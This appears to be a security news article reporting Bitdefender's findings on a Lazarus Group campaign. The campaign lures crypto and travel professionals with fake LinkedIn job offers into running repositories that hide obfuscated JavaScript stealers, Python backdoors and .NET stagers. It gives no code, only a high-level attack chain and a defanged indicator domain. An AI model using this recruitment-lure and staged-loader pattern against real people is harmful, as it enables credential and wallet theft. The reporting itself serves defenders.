The Lazarus Group, a cyber-syndicate linked to North Korea, has been observed orchestrating a nefarious operation that exploits fabricated LinkedIn job solicitations within the cryptocurrency and travel industries. The ultimate objective? Deploying insidious malware engineered to compromise Windows, macOS, and Linux environments alike.
As per intelligence from cybersecurity entity Bitdefender, the ruse commences with a seemingly innocuous outreach on a professional networking platform, luring unsuspecting professionals with enticing prospects of remote employment, flexible hours, and lucrative compensation..
While appearing routine, these solicitations serve a more insidious purpose—exfiltrating sensitive personal data and lending a façade of legitimacy to the engagement.
The Infiltration Blueprint
Upon securing the targeted information, the adversary, masquerading as a recruiter, furnishes the victim with a GitHub or Bitbucket repository link purportedly containing a prototype for a decentralized exchange (DEX). The victim is then instructed to review the code and provide feedback.
Embedded within the repository’s architecture is a cryptically obfuscated JavaScript payload, programmed to fetch a secondary-stage infection from api.npoint[.]io
. This malicious script operates as a cross-platform credential pilferer, surgically extracting cryptocurrency wallet credentials from browser extensions.
Beyond its primary espionage role, the stealer functions as a malware loader, fetching a Python-based backdoor designed to monitor clipboard activities, sustain persistent remote access, and deploy supplementary malware modules.
Tactical Parallels to Contagious Interview
Bitdefender’s findings underscore striking resemblances to an already documented threat cluster denominated Contagious Interview (alternatively identified as DeceptiveDevelopment or DEV#POPPER). This campaign is notorious for disseminating the BeaverTail JavaScript infostealer alongside an auxiliary Python-based implant, InvisibleFerret.
At a later phase in the infection chain, the Python-delivered malware deploys a .NET-based payload—a binary capable of establishing a Tor proxy connection, exfiltrating system diagnostics, and dropping an additional keystroke logger, data exfiltration utility, and cryptocurrency miner.
“The adversary’s attack sequence is intricately layered, leveraging an arsenal of programming languages and an array of execution tactics,” Bitdefender elaborated.
Among the deployed methodologies:
- Multi-tiered Python scripts that recursively decode and execute malicious routines.
- A JavaScript stealer that initially scrapes browser-stored data before escalating to deeper payload injections.
- .NET-based stagers engineered to neutralize security defenses, configure Tor proxies, and propagate cryptojacking malware.
Campaign Proliferation and Persistence
The Lazarus Group’s stratagem appears to be disseminating widely, with anecdotal evidence surfacing on LinkedIn and Reddit detailing variations of the scheme. Some victims report being directed to clone a Web3 repository and execute it locally under the guise of a technical assessment, while others are asked to rectify deliberately embedded code anomalies.
A particular Bitbucket repository implicated in this campaign referenced a project designated “miketoken_v2”, though it has since been expunged from the hosting platform.
This revelation emerges merely one day following cybersecurity firm SentinelOne’s disclosure of an overlapping attack chain, wherein Contagious Interview is utilized to distribute an alternative strain of malware dubbed FlexibleFerret.